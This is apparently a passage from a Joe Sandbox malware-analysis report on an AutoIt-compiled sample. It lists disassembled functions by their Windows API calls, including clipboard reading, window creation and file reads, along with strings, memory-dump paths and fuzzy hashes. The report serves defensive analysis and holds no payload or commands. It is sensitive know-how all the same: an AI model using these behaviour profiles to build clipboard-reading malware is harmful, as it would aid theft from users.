                          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                          • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                          • CopyRect.USER32(?,?), ref: 004568BE
                          • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                          • String ID: ($,$tooltips_class32
                          • API String ID: 225202481-3320066284
                          • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                          • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                          • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                          • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                          APIs
                          • OpenClipboard.USER32(?), ref: 0046DCE7
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                          • CloseClipboard.USER32 ref: 0046DD0D
                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                          • CloseClipboard.USER32 ref: 0046DD41
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                          • CloseClipboard.USER32 ref: 0046DD99
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                          • String ID:
                          • API String ID: 15083398-0
                          • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                          • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                          • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                          • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                          APIs
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • GetWindowRect.USER32(?,?), ref: 00471CF7
                          • GetClientRect.USER32(?,?), ref: 00471D05
                          • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                          • GetSystemMetrics.USER32(00000008), ref: 00471D20
                          • GetSystemMetrics.USER32(00000004), ref: 00471D42
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                          • GetSystemMetrics.USER32(00000007), ref: 00471D79
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                          • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                          • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                          • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                          • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                          • GetClientRect.USER32(?,?), ref: 00471E8A
                          • GetStockObject.GDI32(00000011), ref: 00471EA6
                          • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                          • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                          • String ID: @$AutoIt v3 GUI
                          • API String ID: 867697134-3359773793
                          • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                          • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                          • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                          • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                          • API String ID: 1503153545-1459072770
                          • Opcode ID: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                          • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                          • Opcode Fuzzy Hash: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                          • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __wcsicoll$__wcsnicmp
                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                          • API String ID: 790654849-32604322
                          • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                          • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                          • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                          • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                          • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                          • Opcode Fuzzy Hash: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                          • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                          APIs
                            • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                          • _fseek.LIBCMT ref: 00452B3B
                          • __wsplitpath.LIBCMT ref: 00452B9B
                          • _wcscpy.LIBCMT ref: 00452BB0
                          • _wcscat.LIBCMT ref: 00452BC5
                          • __wsplitpath.LIBCMT ref: 00452BEF
                          • _wcscat.LIBCMT ref: 00452C07
                          • _wcscat.LIBCMT ref: 00452C1C
                          • __fread_nolock.LIBCMT ref: 00452C53
                          • __fread_nolock.LIBCMT ref: 00452C64
                          • __fread_nolock.LIBCMT ref: 00452C83
                          • __fread_nolock.LIBCMT ref: 00452C94
                          • __fread_nolock.LIBCMT ref: 00452CB5
                          • __fread_nolock.LIBCMT ref: 00452CC6
                          • __fread_nolock.LIBCMT ref: 00452CD7
                          • __fread_nolock.LIBCMT ref: 00452CE8
                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                          • __fread_nolock.LIBCMT ref: 00452D78
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                          • String ID:
                          • API String ID: 2054058615-0
                          • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                          • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                          • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                          • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window
                          • String ID: 0
                          • API String ID: 2353593579-4108050209
                          • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                          • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                          • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                          • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                          APIs
                          • GetSysColor.USER32(0000000F), ref: 0044A05E
                          • GetClientRect.USER32(?,?), ref: 0044A0D1
                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                          • GetWindowDC.USER32(?), ref: 0044A0F6
                          • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                          • ReleaseDC.USER32(?,?), ref: 0044A11B
                          • GetSysColor.USER32(0000000F), ref: 0044A131
                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                          • GetSysColor.USER32(0000000F), ref: 0044A14F
                          • GetSysColor.USER32(00000005), ref: 0044A15B
                          • GetWindowDC.USER32(?), ref: 0044A1BE
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                          • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                          • ReleaseDC.USER32(?,00000000), ref: 0044A229
                          • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                          • GetSysColor.USER32(00000008), ref: 0044A265
                          • SetTextColor.GDI32(?,00000000), ref: 0044A270
                          • SetBkMode.GDI32(?,00000001), ref: 0044A282
                          • GetStockObject.GDI32(00000005), ref: 0044A28A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                          • String ID:
                          • API String ID: 1744303182-0
                          • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                          • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                          • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                          • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                          • __mtterm.LIBCMT ref: 00417C34
                            • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                            • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                          • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                          • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                          • __init_pointers.LIBCMT ref: 00417CE6
                          • __calloc_crt.LIBCMT ref: 00417D54
                          • GetCurrentThreadId.KERNEL32 ref: 00417D80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 4163708885-3819984048
                          • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                          • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                          • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                          • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID: >>>AUTOIT SCRIPT<<<$\
                          • API String ID: 0-1896584978
                          • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                          • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                          • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                          • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __wcsicoll$IconLoad
                          • String ID: blank$info$question$stop$warning
                          • API String ID: 2485277191-404129466
                          • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                          • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                          • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                          • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                          APIs
                          • LoadIconW.USER32(?,00000063), ref: 0045464C
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                          • SetWindowTextW.USER32(?,?), ref: 00454678
                          • GetDlgItem.USER32(?,000003EA), ref: 00454690
                          • SetWindowTextW.USER32(00000000,?), ref: 00454697
                          • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                          • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                          • GetWindowRect.USER32(?,?), ref: 004546F5
                          • SetWindowTextW.USER32(?,?), ref: 00454765
                          • GetDesktopWindow.USER32 ref: 0045476F
                          • GetWindowRect.USER32(00000000), ref: 00454776
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                          • GetClientRect.USER32(?,?), ref: 004547D2
                          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                          • String ID:
                          • API String ID: 3869813825-0
                          • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                          • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                          • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                          • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                          APIs
                          • _wcslen.LIBCMT ref: 00464B28
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                          • _wcslen.LIBCMT ref: 00464C28
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                          • _wcslen.LIBCMT ref: 00464CBA
                          • _wcslen.LIBCMT ref: 00464CD0
                          • _wcslen.LIBCMT ref: 00464CEF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
